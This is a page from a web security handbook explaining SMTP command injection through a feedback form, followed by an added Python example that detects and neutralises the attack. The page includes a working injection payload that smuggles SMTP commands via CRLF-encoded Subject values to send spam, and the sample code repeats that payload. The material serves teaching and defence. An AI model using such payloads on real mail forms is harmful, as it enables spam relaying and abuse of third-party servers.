The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws


Chapter 9  ■ Injecting Code




Page 323




NOTE: After the SMTP client issues the DATA command, it sends the contents of the email message, comprising the message headers and body, and then sends a single dot character on its own line. This tells the server that the message is complete, and the client can then issue further SMTP commands, to send further messages.

In this situation, you may be able to inject arbitrary SMTP commands into any of the email fields that you control. For example, you can attempt to inject into the Subject field as follows:

POST feedback.php HTTP/1.1
Host: wahh-app.com
Content-Length: 266

From=daf@wahh-mail.com&Subject=Site+feedback%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+mail@wahh-viagra.com%0d%0aRCPT+TO:+john@wahh-mail.com%0d%0aDATA%0d%0aFrom:+mail@wahh-viagra.com%0d%0aTo:+john@wahh-mail.com%0d%0aSubject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a&Message=foo

If the application is vulnerable, then this will result in the following SMTP conversation, which generates two different email messages, with the second being entirely within your control:

MAIL FROM: daf@wahh-mail.com
RCPT TO: feedback@wahh-app.com
DATA
From: daf@wahh-mail.com
To: feedback@wahh-app.com
Subject: Site+feedback
foo
.
MAIL FROM: mail@wahh-viagra.com
RCPT TO: john@wahh-mail.com
DATA
From: mail@wahh-viagra.com
To: john@wahh-mail.com
Subject: Cheap V1AGR4
Blah
.
foo
.
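As an added example that is not from the book: how a feedback handler on the server side can recognise the injection above before the values reach the SMTP session, and neutralise a lone dot in the message body. The handler, the field names it inspects and the sample bodies are assumptions (the book's feedback.php is not shown).

```python
# Added example (not from the book): server-side handling that detects and
# neutralises the SMTP injection shown above. The feedback handler itself
# is hypothetical; the book's feedback.php is not shown.
import re
from urllib.parse import parse_qs

# Constructed sample: the page's POST body, reassembled into one string.
INJECTED_BODY = (
    "From=daf@wahh-mail.com&Subject=Site+feedback%0d%0afoo%0d%0a%2e%0d%0a"
    "MAIL+FROM:+mail@wahh-viagra.com%0d%0aRCPT+TO:+john@wahh-mail.com%0d%0a"
    "DATA%0d%0aFrom:+mail@wahh-viagra.com%0d%0aTo:+john@wahh-mail.com%0d%0a"
    "Subject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a&Message=foo"
)
BENIGN_BODY = "From=daf@wahh-mail.com&Subject=Site+feedback&Message=foo"

HEADER_FIELDS = ("From", "Subject")   # form fields copied into SMTP headers
LINE_BREAK_RE = re.compile(r"[\r\n\x00]")

def form_fields(body: str) -> dict:
    """URL-decode the form body (%0d%0a becomes CR LF, '+' becomes a space)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def decoded_lines(body: str, field: str) -> list:
    """The lines a field would contribute to the SMTP session once decoded.
    More than one line means the value escapes its header."""
    return form_fields(body).get(field, "").splitlines()

def header_safe(value: str) -> bool:
    """A header value must be a single line: no CR, LF or NUL."""
    return LINE_BREAK_RE.search(value) is None

def check_submission(body: str) -> dict:
    """Map each unsafe header field to a reason; an empty dict means the
    submission may be handed to the mailer."""
    fields = form_fields(body)
    return {name: "line break in header field"
            for name in HEADER_FIELDS
            if name in fields and not header_safe(fields[name])}

def dot_stuff(message: str) -> str:
    """RFC 5321 section 4.5.2 transparency: prefix every line that starts
    with '.' with another '.', so a lone '.' in the body cannot end DATA."""
    return "\n".join("." + ln if ln.startswith(".") else ln
                     for ln in message.split("\n"))

if __name__ == "__main__":
    print("Subject decodes to:", decoded_lines(INJECTED_BODY, "Subject"))
    print("injected:", check_submission(INJECTED_BODY))
    print("benign:", check_submission(BENIGN_BODY))
```

Rejecting header fields that contain a line break removes the injection vector entirely; dot-stuffing is the separate, standard protection for the free-text message body, which legitimately spans several lines.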

